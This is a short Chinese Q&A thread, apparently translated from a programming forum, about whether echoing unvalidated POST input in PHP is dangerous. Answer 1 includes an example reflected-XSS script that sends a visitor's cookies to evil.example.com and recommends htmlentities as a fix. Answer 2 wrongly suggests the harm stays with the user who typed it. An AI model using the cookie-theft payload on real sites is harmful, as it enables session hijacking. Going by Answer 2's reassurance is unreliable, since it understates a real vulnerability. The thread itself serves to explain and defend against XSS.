PHP文件包含

Question

我有一个文本框，在这个文本框中，用户输入一个值，而PHP脚本则会对其进行回音。Textbox通过POST发送到服务器，并保存在一个名为Temp的变量中。

如果我用下面的行创建输出脚本，回显是否会阻止文件包含或任意PHP注入，前提是没有进行验证？

<?php echo $Temp; ?>

Answer 1

这是一个典型的反映跨站点脚本漏洞。注入的代码不会在服务器上执行。

恶意用户可以设置自己的站点，发布到您的表单。POSTed值可能类似于

<script>
new Img().src = 'https://evil.example.com?' + escape(document.cookie);
</script>

当登录到站点的用户访问恶意页面时，攻击者将为您的站点检索用户的cookie(当然，没有标记为HttpOnly的任何cookie)。要减轻这种情况，请执行以下操作：

<?php echo htmlentities($Temp); ?>

它将显示任何脚本为HTML，而不是执行它。

Answer 2

mkaatman的回答可能回答你的问题，也可能不回答。Javascript是客户端，所以没有任何服务器端恶意发生。如果用户在文本框中放了一些恶意的东西，您就会返回给他们，他们只会在客户端影响自己。

换句话说，如果您所做的只是存储和回显，PHP将不会执行用户在该变量中输入的内容。不会对服务器造成伤害..。我想这就是你想要的

Answer 3

不是的。我可以在输入中输入恶意javascript代码，当您查看使用<?php echo $Temp; ?>生成的页面时，浏览器将执行该代码。